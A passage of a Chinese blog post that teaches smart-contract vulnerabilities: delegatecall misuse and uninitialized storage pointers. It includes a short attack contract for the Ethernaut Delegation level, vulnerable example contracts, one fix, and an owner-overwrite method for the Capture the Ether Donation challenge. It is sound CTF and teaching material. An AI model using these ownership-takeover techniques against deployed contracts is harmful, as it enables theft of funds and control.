<p>先分别理解一下三种call调用的异同</p>
<ul>
<li>call: 最常用的调用方式，调用后内置变量 msg 的值会修改为调用者，执行环境为被调用者的运行环境(合约的 storage)。</li>
<li>delegatecall: 调用后内置变量 msg 的值不会修改为调用者，但执行环境为调用者的运行环境。</li>
<li>callcode: 调用后内置变量 msg 的值会修改为调用者，但执行环境为调用者的运行环境。</li>
</ul>
<hr>
<p>情况一：call</p>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/08/50fd76c3-bf36-4b06-8e28-c606be9be0e1.png" alt="Untitled"></p>
<p>A合约：</p>
<p>temp1 &#x3D; 0</p>
<p>temp2 &#x3D; 0</p>
<p>B合约：</p>
<p>temp1 &#x3D; A合约地址</p>
<p>temp2 &#x3D; 100</p>
<p>说明：call调用后内置变量 msg 的值会修改为调用者（A合约地址），执行环境为被调用者（B合约）的运行环境(运行环境指合约的 storage)</p>
<p>情况二：delegatecall</p>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/08/3a7d62b8-2060-4b90-b6c3-79be27d2f591.png" alt="Untitled"></p>
<p>A合约：</p>
<p>temp1 &#x3D; 调用A合约的以太坊账号地址</p>
<p>temp2 &#x3D; 100</p>
<p>B合约：</p>
<p>temp1 &#x3D; 0</p>
<p>temp2 &#x3D; 0</p>
<p>说明：delegatecall调用后内置变量 msg 的值不会修改为调用者（A合约地址），但执行环境为调用者（A合约）的运行环境</p>
<p>情况三：callcode</p>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/08/d4ee4b39-2255-439e-8ed1-a667e169139c.png" alt="Untitled"></p>
<p>callcode在solidity 0.5.0之后就被改变成了delegatecal</p>
<p>A合约：</p>
<p>temp1 &#x3D; A合约地址</p>
<p>temp2 &#x3D; 100</p>
<p>B合约：</p>
<p>temp1 &#x3D; 0</p>
<p>temp2 &#x3D; 0</p>
<p>说明：callcode调用后内置变量 msg 的值会修改为调用者（A合约地址），但执行环境为调用者（A合约）的运行环境。</p>
<p>例：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract Delegate &#123;</span><br><span class="line"></span><br><span class="line">  address public owner;</span><br><span class="line"></span><br><span class="line">  constructor(address _owner) public &#123;</span><br><span class="line">    owner = _owner;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function pwn() public &#123;</span><br><span class="line">    owner = msg.sender;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract Delegation &#123;</span><br><span class="line"></span><br><span class="line">  address public owner;</span><br><span class="line">  Delegate delegate;</span><br><span class="line"></span><br><span class="line">  constructor(address _delegateAddress) public &#123;</span><br><span class="line">    delegate = Delegate(_delegateAddress);</span><br><span class="line">    owner = msg.sender;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  fallback() external &#123;</span><br><span class="line">    (bool result,) = address(delegate).delegatecall(msg.data);</span><br><span class="line">    if (result) &#123;</span><br><span class="line">      this;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析：使用delegatecall，将会在调用者环境下执行，delegatecal即可修改合约中的owner</p>
<p>attack：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">contract attack&#123;</span><br><span class="line">    address target =0xd2a5bC10698FD955D1Fe6cb468a17809A08fd005;</span><br><span class="line">    bytes4 public result;</span><br><span class="line">    function trandform()public&#123;</span><br><span class="line">    result=bytes4(keccak256(&quot;pwn()&quot;));</span><br><span class="line">&#125;</span><br><span class="line">    function pwn() public payable&#123;</span><br><span class="line">    target.call(abi.encodePacked(result,&quot;&quot;));</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>相应例题</p>
<p>ethernaut第六题——delegation</p>
<p><a target="_blank" rel="noopener" href="https://ethernaut.openzeppelin.com/level/0x9451961b7Aea1Df57bc20CC68D72f662241b5493">https://ethernaut.openzeppelin.com/level/0x9451961b7Aea1Df57bc20CC68D72f662241b5493</a></p>
<p>call调用：</p>
<p>我现在能想到的关于call调用的漏洞就只有两个，一个是重入</p>
<p>重入在基础漏洞的第一篇就已经说过了</p>
<p><a target="_blank" rel="noopener" href="https://www.notion.so/d1727bc0a944423baf2f0f2611fa1500">关于转账的漏洞 </a></p>
<p>还有一个就是权限绕过，参考vnctf里边的vnloan那道题吧，之前发过博客，这里就不在说了</p>
<p><a target="_blank" rel="noopener" href="https://tttang.com/archive/1445/">VNCTF2022公开赛 Blockchain-VNloan - 跳跳糖</a></p>
<p>还有就是关于callcode的例题，目前还没遇到过，等遇到了，我再补到这里</p>
<h1 id="6-未初始化的存储指针"><a href="#6-未初始化的存储指针" class="headerlink" title="6.未初始化的存储指针"></a>6.未初始化的存储指针</h1><p>原理：未初始化的存储指针是指在 EVM 中未进行初始化的 storage 变量，这个变量会指向其他变量的区域，从而更改其他变量的值。</p>
<p>在solidity智能合约语言中，有storage和memory两种存储方式。storage变量是指永远存储在区块链中的变量；memory变量的存储是临时的，这些变量在外部调用结束后会被移除。但是solidity目前对复杂的数据类型，比如array(数组)和struct(结构体)，在函数中作为局部变量时，会默认存储在storaeg中。solidity对于变量存储，都是按照状态在合约中的先后顺序进行依次存储的</p>
<p>例：</p>
<p>结构体</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity 0.4.24;</span><br><span class="line">contract cover&#123;</span><br><span class="line">    address public owner=msg.sender;</span><br><span class="line">    struct Name&#123;</span><br><span class="line">        address user;</span><br><span class="line">        mapping(address=&gt;uint)balanceof;</span><br><span class="line">    &#125;</span><br><span class="line">    function regeist(address youraddress) public payable&#123;</span><br><span class="line">        Name name;</span><br><span class="line">        require(msg.value&gt;0);</span><br><span class="line">        name.user=youraddress;</span><br><span class="line">        name.balanceof[youraddress]+=msg.value;</span><br><span class="line">    &#125;</span><br><span class="line">    function getbalance(address tar)public view returns(uint balance)&#123;</span><br><span class="line">        Name name;</span><br><span class="line">        return name.balanceof[tar];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在进行注册并存款时，由于该storage变量未初始化，所以可能会覆盖其他变量，owner将会被覆盖为youraddress</p>
<p>比如合约部署后，owner为合约部署者，但是在用户拿着自己的地址进行注册时，owner就变成了user</p>
<p>部署后</p>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/09/c7b43c44-8a35-40b6-8655-c9a2821e9e7e.png" alt="Untitled.png"></p>
<p>regeist后</p>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/09/a983431c-c880-4fa5-844b-7efdcf7a88d6.png" alt="Untitled1.png"></p>
<p>可见owner被覆盖</p>
<p>这个例子的修复方案是使用 mapping 进行结构体的初始化，并使用 storage 进行拷贝：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity 0.4.24;</span><br><span class="line">contract cover&#123;</span><br><span class="line">    address public owner=msg.sender;</span><br><span class="line">    struct Name&#123;</span><br><span class="line">        address user;</span><br><span class="line">        mapping(address=&gt;uint)balanceof;</span><br><span class="line">    &#125;</span><br><span class="line">    mapping(uint=&gt;Name)wallet;</span><br><span class="line">    function regeist(uint id,address youraddress) public payable&#123;</span><br><span class="line">        Name storage wallets=wallet[id];</span><br><span class="line">        require(msg.value&gt;0);</span><br><span class="line">        wallets.user=youraddress;</span><br><span class="line">        wallets.balanceof[youraddress]+=msg.value;</span><br><span class="line">    &#125;</span><br><span class="line">    function getbalance(uint id,address tar)public view returns(uint balance)&#123;</span><br><span class="line">        Name storage wallets=wallet[id];</span><br><span class="line">        return wallets.balanceof[tar];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://storage.tttang.com/media/attachment/2022/04/09/bbcf04db-fbb9-4464-b23a-b302a6eb24bc.png" alt="Untitled2.png"></p>
<p>部署合约后owner不会改变</p>
<p>数组</p>
<p>代码来源于ctf wiki</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.24;</span><br><span class="line"></span><br><span class="line">contract example2&#123;</span><br><span class="line">    uint public a;</span><br><span class="line">    uint[] b;</span><br><span class="line"></span><br><span class="line">    function setValue(uint _a) public &#123;</span><br><span class="line">        a = _a;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function attack(uint _value) public &#123;</span><br><span class="line">        uint[] tmp;</span><br><span class="line">        tmp.push(_value);</span><br><span class="line">        b = tmp;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://storage.tttang.com/media/attachment/2022/04/09/1dc815d7-ac28-4f8f-9bdd-8ddc35289a50.png" alt="Untitled3.png"></p>
<p>部署合约后设置a为100，在用任意数字调用attack，在看a，可以发现a变成了101</p>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/09/1e156f74-2f03-401a-920c-e6f7f88055be.png" alt="Untitled4.png"></p>
<p>可见初始化时uint[] tmp导致数组长度变成了a的值，在进行push后，将temp赋值给b，此时覆盖了a为b的长度即100+1&#x3D;101</p>
<p>例题：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.4.21;</span><br><span class="line"></span><br><span class="line">contract DonationChallenge &#123;</span><br><span class="line">    struct Donation &#123;</span><br><span class="line">        uint256 timestamp;</span><br><span class="line">        uint256 etherAmount;</span><br><span class="line">    &#125;</span><br><span class="line">    Donation[] public donations;</span><br><span class="line"></span><br><span class="line">    address public owner;</span><br><span class="line"></span><br><span class="line">    function DonationChallenge() public payable &#123;</span><br><span class="line">        require(msg.value == 1 ether);</span><br><span class="line">        </span><br><span class="line">        owner = msg.sender;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    function isComplete() public view returns (bool) &#123;</span><br><span class="line">        return address(this).balance == 0;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function donate(uint256 etherAmount) public payable &#123;</span><br><span class="line">        // amount is in ether, but msg.value is in wei</span><br><span class="line">        uint256 scale = 10**18 * 1 ether;</span><br><span class="line">        require(msg.value == etherAmount / scale);</span><br><span class="line"></span><br><span class="line">        Donation donation;</span><br><span class="line">        donation.timestamp = now;</span><br><span class="line">        donation.etherAmount = etherAmount;</span><br><span class="line"></span><br><span class="line">        donations.push(donation);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function withdraw() public &#123;</span><br><span class="line">        require(msg.sender == owner);</span><br><span class="line">        </span><br><span class="line">        msg.sender.transfer(address(this).balance);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析：执行donate时Donation初始化并传入对应参数，没有强调memory，所以占用storage，实际修改值为slot0以及slot1，所以将etherAmount为int(address(player),16)即可修改owner为player。</p>
<p>capture the ether——Donation</p>
<p><a target="_blank" rel="noopener" href="https://capturetheether.com/challenges/math/donation/">https://capturetheether.com/challenges/math/donation/</a></p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>bcYng
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://bcyng-w.github.io/2022/04/10/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E%E6%B1%87%E6%80%BB/" title="智能合约基础漏洞汇总">http://bcyng-w.github.io/2022/04/10/基础漏洞汇总/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%8C%BA%E5%9D%97%E9%93%BE/" rel="tag"># 区块链</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/03/21/capture%20the%20ether%E4%B8%8B/" rel="prev" title="capture the ether靶场刷题part2/2">
      <i class="fa fa-chevron-left"></i> capture the ether靶场刷题part2/2
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-%E5%85%B3%E4%BA%8E%E8%BD%AC%E8%B4%A6%E7%9A%84%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.</span> <span class="nav-text">1.关于转账的漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#call%E8%BD%AC%E8%B4%A6%E6%BC%8F%E6%B4%9E%E2%80%94%E2%80%94%E9%87%8D%E5%85%A5"><span class="nav-number">1.1.</span> <span class="nav-text">call转账漏洞——重入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#transfer%E8%BD%AC%E8%B4%A6%E6%BC%8F%E6%B4%9E%E2%80%94%E2%80%94%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1"><span class="nav-number">1.2.</span> <span class="nav-text">transfer转账漏洞——拒绝服务</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.</span> <span class="nav-text">2.整数溢出漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"><span class="nav-number">2.1.</span> <span class="nav-text">溢出漏洞</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-%E9%9A%8F%E6%9C%BA%E6%95%B0%E6%BC%8F%E6%B4%9E"><span class="nav-number">3.</span> <span class="nav-text">3.随机数漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4-%E7%9F%AD%E5%9C%B0%E5%9D%80%E6%BC%8F%E6%B4%9E"><span class="nav-number">4.</span> <span class="nav-text">4.短地址漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5-call%E8%B0%83%E7%94%A8%E6%BC%8F%E6%B4%9E"><span class="nav-number">5.</span> <span class="nav-text">5.call调用漏洞</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#6-%E6%9C%AA%E5%88%9D%E5%A7%8B%E5%8C%96%E7%9A%84%E5%AD%98%E5%82%A8%E6%8C%87%E9%92%88"><span class="nav-number">6.</span> <span class="nav-text">6.未初始化的存储指针</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="bcYng"
      src="https://raw.githubusercontent.com/bcYng-w/images/main/touxaing.png">
  <p class="site-author-name" itemprop="name">bcYng</p>
  <div class="site-description" itemprop="description">前程似锦</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/bcYng-w" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;bcYng-w" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://mail.qq.com/cgi-bin/qm_share?t=qm_mailme&email=2384417651@qq.com" title="E-Mail → https:&#x2F;&#x2F;mail.qq.com&#x2F;cgi-bin&#x2F;qm_share?t&#x3D;qm_mailme&amp;email&#x3D;2384417651@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2022-2-14 – 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">bcYng</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共28.7k字</span>
</div>


    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       	
});
</script> 

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
